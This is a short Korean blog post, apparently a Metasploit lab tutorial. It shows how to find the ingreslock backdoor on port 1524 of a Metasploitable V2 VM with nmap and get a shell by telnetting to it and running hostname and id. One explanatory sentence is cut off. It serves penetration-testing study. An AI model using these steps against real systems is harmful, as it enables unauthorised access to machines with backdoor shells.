(7) 버그를 공격하는 경우(Backdoor 존재하는 경우)
■ 실습 시스템
- KaliLinux (EX: attacker system)
- Metasploitable V2 Linux (EX: victim system)
■ 공격의 개요
Ingreslock backdoor
Much less subtle is the old standby "ingreslock" backdoor that is listening on port 1524. The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server
1524번 포트는 Ingre 데이터 베이스 Lock 서비스용 포트이다. 이 포트는 512
■ 취약점 공격 과정(backdoor 존재하는 경우)
(KaliLinux)
# nmap 192.168.10.134
....
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
....
# telnet 192.168.10.134 1524
# hostname
# id
# exit
'Learning > └◆Metasploit' 카테고리의 다른 글
MSF 관련 명령어 정리 (0) | 2017.01.10 |
---|---|
Metasploitable V2 Linux 서버의 취약점(RMI) (0) | 2017.01.10 |
Metasploitable V2 Linux 서버의 취약점(distccd,samba) (0) | 2017.01.10 |
Metasploitable V2 Linux 서버의 취약점(IRC) (0) | 2017.01.10 |